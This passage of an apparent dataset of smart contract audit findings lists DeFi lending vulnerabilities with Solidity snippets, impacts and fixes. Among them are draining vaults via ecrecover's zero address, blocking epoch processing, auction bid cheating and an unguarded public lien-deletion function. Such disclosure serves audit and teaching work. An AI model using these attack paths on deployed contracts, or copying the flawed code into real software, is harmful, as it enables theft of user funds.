that he received. 
To not have loses, the amount of shares should be at least bigger than amount of base tokens provided by user.\\n```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nWhile calling market place, you can see that slippage of 1 percent is provided.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n```\\n\\nBut this is not enough in some cases.\\nFor example we have `ERC5095` token with short maturity which provides `0.5%` of interests. userA calls `deposit` function with 1000 as base amount. He wants to get back 1005 share tokens. And after maturity time earn 5 tokens on this trade.\\nBut because of slippage set to `1%`, it's possible that the price will change and user will receive 995 share tokens instead of 1005, which means that user has lost 5 base tokens.\\nI propose to add one more mechanism except of slippage. 
We need to check if returned shares amount is bigger then provided assets amount.","Add this check at the end `require(returned > a, ""received less than provided"")`",Lost of funds.,"```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n" +Curve LP Controller withdraw and claim function uses wrong signature,medium,"The function signature used for `WITHDRAWCLAIM` in both CurveLPStakingController.sol and BalancerLPStakingController.sol are incorrect, leading to the function not succeeding.\\nIn both the CurveLPStakingController.sol and BalancerLPStakingController.sol contracts, the function selector `0x00ebf5dd` is used for `WITHDRAWCLAIM`. This selector corresponds to a function signature of `withdraw(uint256,address,bool)`.\\n```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n\\nHowever, the `withdraw()` function in the Curve contract does not have an address argument. Instead, the function signature reads `withdraw(uint256,bool)`, which corresponds to a function selector of `0x38d07436`.",Change the function selector in both contracts to `0x38d07436`.,Users who have deposited assets into Curve pools will not be able to claim their rewards when they withdraw their tokens.,```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n +Strategist nonce is not checked,medium,"Strategist nonce is not checked while checking commitment. 
This makes impossible for strategist to cancel signed commitment.\\n`VaultImplementation.commitToLien` is created to give the ability to borrow from the vault. The conditions of loan are discussed off chain and owner or delegate of the vault then creates and signes deal details. Later borrower can provide it as `IAstariaRouter.Commitment calldata params` param to `VaultImplementation.commitToLien`.\\nAfter the checking of signer of commitment `VaultImplementation._validateCommitment` function calls `AstariaRouter.validateCommitment`.\\n```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n ""deadline passed""\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n ""invalid strategy type""\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n\\nThis function check additional params, one of which is `commitment.lienRequest.strategy.deadline`. But it doesn't check for the nonce of strategist here. But this nonce is used while signing.\\nAlso `AstariaRouter` gives ability to increment nonce for strategist, but it is never called. That means that currently strategist use always same nonce and can't cancel his commitment.",Give ability to strategist to call `increaseNonce` function.,Strategist can't cancel his commitment. 
User can use this commitment to borrow up to 5 times.,"```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n ""deadline passed""\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n ""invalid strategy type""\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n" +"The implied value of a public vault can be impaired, liquidity providers can lose funds",high,"The implied value of a public vault can be impaired, liquidity providers can lose funds\\nBorrowers can partially repay their liens, which is handled by the `_payment` function (LienToken.sol#L594). 
When repaying a part of a lien, `lien.amount` is updated to include currently accrued debt (LienToken.sol#L605-L617):\\n```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n\\nNotice that `lien.amount` is updated in storage, and `lien.last` wasn't updated.\\nThen, lien's slope is subtracted from vault's slope accumulator to be re-calculated after the repayment (LienToken.sol#L620-L630):\\n```\\nif (isPublicVault) {\\n // @audit calculates and subtracts lien's slope from vault's slope\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n}\\nif (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n // @audit lien.last is updated only after payment amount subtraction\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n // @audit re-calculates and re-applies lien's slope after the repayment\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n}\\n```\\n\\nIn the `beforePayment` function, `LIEN_TOKEN().calculateSlope(lienId)` is called to calculate lien's current slope (PublicVault.sol#L433-L442):\\n```\\nfunction beforePayment(uint256 lienId, uint256 amount) public onlyLienToken {\\n _handleStrategistInterestReward(lienId, amount);\\n uint256 lienSlope = LIEN_TOKEN().calculateSlope(lienId);\\n if (lienSlope > slope) {\\n slope = 0;\\n } else {\\n slope -= lienSlope;\\n }\\n last = block.timestamp;\\n}\\n```\\n\\nThe `calculateSlope` function reads a lien from storage and calls `_getOwed` again (LienToken.sol#L440-L445):\\n```\\nfunction calculateSlope(uint256 lienId) public view returns (uint256) {\\n // @audit lien.amount includes interest accrued so far\\n Lien memory lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n uint256 owedAtEnd = _getOwed(lien, end);\\n // @audit lien.last wasn't 
updated in `_payment`, it's an older timestamp\\n return (owedAtEnd - lien.amount).mulDivDown(1, end - lien.last);\\n}\\n```\\n\\nThis is where double counting of accrued interest happens. Recall that lien's amount already includes the interest that was accrued by this moment (in the `_payment` function). Now, interest is calculated again and is applied to the amount that already includes (a portion) it (LienToken.sol#L544-L550):\\n```\\nfunction _getOwed(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n // @audit lien.amount already includes interest accrued so far\\n return lien.amount + _getInterest(lien, timestamp);\\n}\\n```\\n\\nLienToken.sol#L177-L196:\\n```\\nfunction _getInterest(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n if (!lien.active) {\\n return uint256(0);\\n }\\n uint256 delta_t;\\n if (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n } else {\\n // @audit lien.last wasn't updated in `_payment`, so the `delta_t` is bigger here\\n delta_t = uint256(timestamp.safeCastTo32() - lien.last);\\n }\\n return\\n // @audit rate applied to a longer delta_t and multiplied by a bigger amount than expected\\n delta_t.mulDivDown(lien.rate, 1).mulDivDown(\\n lien.amount,\\n INTEREST_DENOMINATOR\\n );\\n}\\n```\\n","In the `_payment` function, consider updating `lien.amount` after the `beforePayment` call:\\n```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/src/LienToken.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/LienToken.sol\\n@@ // Remove the line below\\n614,12 // Add the line below\\n614,13 @@ contract LienToken is ERC721, ILienToken, Auth, TransferAgent {\\n type(IPublicVault).interfaceId\\n );\\n\\n// Remove the line below\\n lien.amount = _getOwed(lien);\\n// Remove the line below\\n\\n address payee = getPayee(lienId);\\n if 
(isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n// Add the line below\\n\\n// Add the line below\\n lien.amount = _getOwed(lien);\\n// Add the line below\\n\\n if (lien.amount > paymentAmount) {\\n lien.amount // Remove the line below\\n= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n```\\n\\nIn this case, lien's slope calculation won't be affected in the `beforePayment` call and the correct slope will be removed from the slope accumulator.","Double counting of interest will result in a wrong lien slope, which will affect the vault's slope accumulator. This will result in an invalid implied value of a vault (PublicVault.sol#L406-L413):\\nIf miscalculated lien slope is bigger than expected, vault's slope will be smaller than expected (due to the subtraction in beforePayment), and vault's implied value will also be smaller. Liquidity providers will lose money because they won't be able to redeem the whole liquidity (vault's implied value, `totalAssets`, is used in the conversion of LP shares, ERC4626-Cloned.sol#L392-L412)\\nIf miscalculated lien slope is smaller than expected, vault's slope will be higher, and vaults implied value will also be higher. However, it won't be backed by actual liquidity, thus the liquidity providers that exit earlier will get a bigger share of the underlying assets. 
The last liquidity provider won't be able to get their entire share.","```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n" +buyoutLien() will cause the vault to fail to processEpoch(),high,"LienToken#buyoutLien() did not reduce vault#liensOpenForEpoch when vault#processEpoch()will check vault#liensOpenForEpoch[currentEpoch] == uint256(0) so processEpoch() will fail\\nwhen create LienToken , vault#liensOpenForEpoch[currentEpoch] will ++ when repay or liquidate , vault#liensOpenForEpoch[currentEpoch] will -- and LienToken#buyoutLien() will transfer from vault to to other receiver,so liensOpenForEpoch need reduce\\n```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n","Issue buyoutLien() will cause the vault to fail to processEpoch()\\n```\\n function buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n// rest of code.\\n\\n+ //do decreaseEpochLienCount()\\n+ address lienOwner = ownerOf(lienId);\\n+ bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n+ type(IPublicVault).interfaceId\\n+ );\\n+ if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) { \\n+ IPublicVault(lienOwner).decreaseEpochLienCount(\\n+ IPublicVault(lienOwner).getLienEpoch(lienData[lienId].start + lienData[lienId].duration)\\n+ );\\n+ } \\n\\n lienData[lienId].last = block.timestamp.safeCastTo32();\\n lienData[lienId].start = block.timestamp.safeCastTo32();\\n lienData[lienId].rate = ld.rate.safeCastTo240();\\n lienData[lienId].duration = ld.duration.safeCastTo32();\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n",processEpoch() maybe fail,"```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** 
tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n" +_deleteLienPosition can be called by anyone to delete any lien they wish,high,"`_deleteLienPosition` is a public function that doesn't check the caller. This allows anyone to call it an remove whatever lien they wish from whatever collateral they wish\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`_deleteLienPosition` is a `public` function and doesn't validate that it's being called by any permissioned account. The result is that anyone can call it to delete any lien that they want. 
It wouldn't remove the lien data but it would remove it from the array associated with `collateralId`, which would allow it to pass the `CollateralToken.sol#releaseCheck` and the underlying to be withdrawn by the user.",Change `_deleteLienPosition` to `internal` rather than `public`.,All liens can be deleted completely rugging lenders,"```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, ""index out of bounds"");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n" +Public vaults can become insolvent because of missing `yIntercept` update,high,"The deduction of `yIntercept` during payments is missing in `beforePayment()` which can lead to vault insolvency.\\n`yIntercept` is declared as ""sum of all LienToken amounts"" and documented elsewhere as ""yIntercept (virtual assets) of a PublicVault"". It is used to calculate the total assets of a public vault as: slope.mulDivDown(delta_t, 1) + `yIntercept`.\\nIt is expected to be updated on deposits, payments, withdrawals, liquidations. However, the deduction of `yIntercept` during payments is missing in `beforePayment()`. 
As noted in the function's Natspec:\\n```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n\\nthe amount of payment should be deducted from `yIntercept` but is missing.",Issue Public vaults can become insolvent because of missing `yIntercept` update\\nUpdate `yIntercept` in `beforePayment()` by the `amount` value.,This missing update will inflate the inferred value of the public vault relative to its actual value leading to eventual insolvency because of resulting protocol miscalculations.,"```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n"
+Bidder can cheat auction by placing bid much higher than reserve price when there are still open liens against a token,high,"When a token still has open liens against it only the value of the liens will be paid by the bidder but their current bid will be set to the full value of the bid. This can be abused in one of two ways. 
The bidder could place a massive bid like 500 ETH that will never be outbid or they could place a bid they know will outbid and profit the difference when they're sent a refund.\\n```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n\\nWe can examine the payment logic inside `_handleIncomingPayment` and see that if there are still open liens against then only the amount of WETH to pay back the liens will be taken from the payer, since the else portion of the logic will be skipped.\\n```\\nuint256 vaultPayment = (amount - currentBid);\\n\\nif (firstBidTime == 0) {\\n auctions[tokenId].firstBidTime = block.timestamp.safeCastTo64();\\n} else if (lastBidder != address(0)) {\\n uint256 lastBidderRefund = amount - vaultPayment;\\n _handleOutGoingPayment(lastBidder, lastBidderRefund);\\n}\\n_handleIncomingPayment(tokenId, vaultPayment, address(msg.sender));\\n\\nauctions[tokenId].currentBid = amount;\\nauctions[tokenId].bidder = address(msg.sender);\\n```\\n\\nIn `createBid`, `auctions[tokenId].currentBid` is set to `amount` after the last bidder is refunded and the excess is paid against liens. We can walk through an example to illustrate this:\\nAssume a token with a single lien of amount 10 WETH and an auction is opened for that token. Now a user places a bid for 20 WETH. 
They are the first bidder so `lastBidder = address(0)` and `currentBid = 0`. `_handleIncomingPayment` will be called with a value of 20 WETH since there is no lastBidder to refund. Inside `_handleIncomingPayment` the lien information is read showing 1 lien against the token. Since `transferAmount >= lien.amount`, `payment = lien.amount`. A payment will be made by the bidder against the lien for 10 WETH. After the payment `_handleIncomingPayment` will return only having taken 10 WETH from the bidder. In the next line currentBid is set to 20 WETH but the bidder has only paid 10 WETH. Now if they are outbid, the new bidder will have to refund then 20 WETH even though they initially only paid 10 WETH.","In `_handleIncomingPayment`, all residual transfer amount should be sent to `COLLATERAL_TOKEN.ownerOf(tokenId)`.",Bidder can steal funds due to `_handleIncomingPayment` not taking enough WETH,"```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n" +Possible to fully block PublicVault.processEpoch function. No one will be able to receive their funds,high,"Possible to fully block `PublicVault.processEpoch` function. 
No one will be able to receive their funds\\nWhen liquidity providers want to redeem their share from `PublicVault` they call `redeemFutureEpoch` function which will create new `WithdrawProxy` for the epoch(if not created already) and then mint shares for redeemer in `WithdrawProxy`. `PublicVault` transfer user's shares to himself.\\n```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, ""Exit epoch too low"");\\n\\n\\n require(msg.sender == owner, ""Only the owner can redeem"");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n\\nThis function mints `WithdrawProxy` shares 1:1 to redeemed `PublicVault` shares. 
Then later after call of `processEpoch` and `transferWithdrawReserve` the funds will be sent to the `WithdrawProxy` and users can now redeem their shares from it.\\nFunction `processEpoch` decides how many funds should be sent to the `WithdrawProxy`.\\n```\\n if (withdrawProxies[currentEpoch] != address(0)) {\\n uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch])\\n .totalSupply();\\n\\n\\n liquidationWithdrawRatio = proxySupply.mulDivDown(1e18, totalSupply());\\n\\n\\n if (liquidationAccountants[currentEpoch] != address(0)) {\\n LiquidationAccountant(liquidationAccountants[currentEpoch])\\n .setWithdrawRatio(liquidationWithdrawRatio);\\n }\\n\\n\\n uint256 withdrawAssets = convertToAssets(proxySupply);\\n // compute the withdrawReserve\\n uint256 withdrawLiquidations = liquidationsExpectedAtBoundary[\\n currentEpoch\\n ].mulDivDown(liquidationWithdrawRatio, 1e18);\\n withdrawReserve = withdrawAssets - withdrawLiquidations;\\n // burn the tokens of the LPs withdrawing\\n _burn(address(this), proxySupply);\\n\\n\\n _decreaseYIntercept(withdrawAssets);\\n }\\n```\\n\\nThis is how it is decided how much money should be sent to WithdrawProxy. Firstly, we look at totalSupply of WithdrawProxy. `uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch]).totalSupply();`.\\nAnd then we convert them to assets amount. `uint256 withdrawAssets = convertToAssets(proxySupply);`\\nIn the end function burns `proxySupply` amount of shares controlled by PublicVault. `_burn(address(this), proxySupply);`\\nThen this amount is allowed to be sent(if no auctions currently, but this is not important right now).\\nThis all allows to attacker to make `WithdrawProxy.deposit` to mint new shares for him and increase totalSupply of WithdrawProxy, so `proxySupply` becomes more then was sent to `PublicVault`.\\nThis is attack scenario.\\n1.PublicVault is created and funded with 50 ethers. 
2.Someone calls `redeemFutureEpoch` function to create new WithdrawProxy for next epoch. 3.Attacker sends 1 wei to WithdrawProxy to make totalAssets be > 0. Attacker deposit to WithdrawProxy 1 wei. Now WithdrawProxy.totalSupply > PublicVault.balanceOf(PublicVault). 4.Someone call `processEpoch` and it reverts on burning.\\nAs result, nothing will be send to WithdrawProxy where shares were minted for users. The just lost money.\\nAlso this attack can be improved to drain users funds to attacker. Attacker should be liquidity provider. And he can initiate next redeem for next epoch, then deposit to new WithdrawProxy enough amount to get new shares. And call `processEpoch` which will send to the vault amount, that was not sent to previous attacked WithdrawProxy, as well. So attacker will take those funds.",Make function WithdrawProxy.deposit not callable.,Funds of PublicVault depositors are stolen.,"```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, ""Exit epoch too low"");\\n\\n\\n require(msg.sender == owner, ""Only the owner can redeem"");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n" +Any public vault without a delegate can be drained,high,"If a public vault is created without a delegate, delegate will have the value of `address(0)`. 
This is also the value returned by `ecrecover` for invalid signatures (for example, if v is set to a positive number that is not 27 or 28), which allows a malicious actor to cause the signature validation to pass for arbitrary parameters, allowing them to drain a vault using a worthless NFT as collateral.\\nWhen a new Public Vault is created, the Router calls the `init()` function on the vault as follows:\\n```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n\\nIf a delegate wasn't set, this will pass `address(0)` to the vault. If this value is passed, the vault simply skips the assignment, keeping the delegate variable set to the default 0 value:\\n```\\nif (params.delegate != address(0)) {\\n delegate = params.delegate;\\n}\\n```\\n\\nOnce the delegate is set to the zero address, any commitment can be validated, even if the signature is incorrect. This is because of a quirk in `ecrecover` which returns `address(0)` for invalid signatures. A signature can be made invalid by providing a positive integer that is not 27 or 28 as the `v` value. The result is that the following function call assigns recovered = address(0):\\n```\\n address recovered = ecrecover(\\n keccak256(\\n encodeStrategyData(\\n params.lienRequest.strategy,\\n params.lienRequest.merkle.root\\n )\\n ),\\n params.lienRequest.v,\\n params.lienRequest.r,\\n params.lienRequest.s\\n );\\n```\\n\\nTo confirm the validity of the signature, the function performs two checks:\\n```\\nrequire(\\n recovered == params.lienRequest.strategy.strategist,\\n ""strategist must match signature""\\n);\\nrequire(\\n recovered == owner() || recovered == delegate,\\n ""invalid strategist""\\n);\\n```\\n\\nThese can be easily passed by setting the `strategist` in the params to `address(0)`.
At this point, all checks will pass and the parameters will be accepted as approved by the vault.\\nWith this power, a borrower can create params that allow them to borrow the vault's full funds in exchange for a worthless NFT, allowing them to drain the vault and steal all the user's funds.",Issue Any public vault without a delegate can be drained\\nAdd a require statement that the recovered address cannot be the zero address:\\n```\\nrequire(recovered != address(0));\\n```\\n,All user's funds held in a vault with no delegate set can be stolen.,```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n +"Auctions can end in epoch after intended, underpaying withdrawers",high,"When liens are liquidated, the router checks if the auction will complete in a future epoch and, if it does, sets up a liquidation accountant and other logistics to account for it. However, the check for auction completion does not take into account extended auctions, which can therefore end in an unexpected epoch and cause accounting issues, losing user funds.\\nThe liquidate() function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis function assumes that the auction will only end in a future epoch if the `auctionWindow` (typically set to 2 days) pushes us into the next epoch.\\nHowever, auctions can last up to an additional 1 day if bids are made within the final 15 minutes. 
In these cases, auctions are extended repeatedly, up to a maximum of 1 day.\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer) {\\n uint64 newDuration = uint256(\\n duration + (block.timestamp + timeBuffer - firstBidTime)\\n ).safeCastTo64();\\n if (newDuration <= auctions[tokenId].maxDuration) {\\n auctions[tokenId].duration = newDuration;\\n } else {\\n auctions[tokenId].duration =\\n auctions[tokenId].maxDuration -\\n firstBidTime;\\n }\\n extended = true;\\n}\\n```\\n\\nThe result is that there are auctions for which accounting is set up for them to end in the current epoch, but will actual end in the next epoch.",Change the check to take the possibility of extension into account:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow() + 1 days)\\n```\\n,"Users who withdrew their funds in the current epoch, who are entitled to a share of the auction's proceeds, will not be paid out fairly.",```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n +Strategists are paid 10x the vault fee because of a math error,high,"Strategists set their vault fee in BPS (x / 10,000), but are paid out as x / 1,000. The result is that strategists will always earn 10x whatever vault fee they set.\\nWhenever any payment is made towards a public vault, `beforePayment()` is called, which calls `_handleStrategistInterestReward()`.\\nThe function is intended to take the amount being paid, adjust by the vault fee to get the fee amount, and convert that amount of value into shares, which are added to `strategistUnclaimedShares`.\\n```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? 
interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n\\nSince the vault fee is stored in basis points, to get the vault fee, we should take the amount, multiply it by `VAULT_FEE()` and divide by 10,000. However, we accidentally divide by 1,000, which results in a 10x larger reward for the strategist than intended.\\nAs an example, if the vault fee is intended to be 10%, we would set `VAULT_FEE = 1000`. In that case, for any amount paid off, we would calculate `fee = amount * 1000 / 1000` and the full amount would be considered a fee for the strategist.",Change the `1000` in the `_handleStrategistInterestReward()` function to `10_000`.,"Strategists will be paid 10x the agreed upon rate for their role, with the cost being borne by users.","```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n" +Claiming liquidationAccountant will reduce vault y-intercept by more than the correct amount,high,"When `claim()` is called on the Liquidation Accountant, it decreases the y-intercept based on the balance of the contract after funds have been distributed, rather than before. 
The result is that the y-intercept will be decreased more than it should be, siphoning funds from all users.\\nWhen `LiquidationAccountant.sol:claim()` is called, it uses its `withdrawRatio` to send some portion of its earnings to the `WITHDRAW_PROXY` and the rest to the vault.\\nAfter performing these transfers, it updates the vault's y-intercept, decreasing it by the gap between the expected return from the auction, and the reality of how much was sent back to the vault:\\n```\\nPublicVault(VAULT()).decreaseYIntercept(\\n (expected - ERC20(underlying()).balanceOf(address(this))).mulDivDown(\\n 1e18 - withdrawRatio,\\n 1e18\\n )\\n);\\n```\\n\\nThis rebalancing uses the balance of the `liquidationAccountant` to perform its calculation, but it is done after the balance has already been distributed, so it will always be 0.\\nLooking at an example:\\n`expected = 1 ether` (meaning the y-intercept is currently based on this value)\\n`withdrawRatio = 0` (meaning all funds will go back to the vault)\\nThe auction sells for exactly 1 ether\\n1 ether is therefore sent directly to the vault\\nIn this case, the y-intercept should not be updated, as the outcome was equal to the `expected` outcome\\nHowever, because the calculation above happens after the funds are distributed, the decrease equals `(expected - 0) * 1e18 / 1e18`, which equals `expected`\\nThat decrease should not happen, and causing problems for the protocol's accounting. For example, when `withdraw()` is called, it uses the y-intercept in its calculation of the `totalAssets()` held by the vault, creating artificially low asset values for a given number of shares.","The amount of assets sent to the vault has already been calculated, as we've already sent it. 
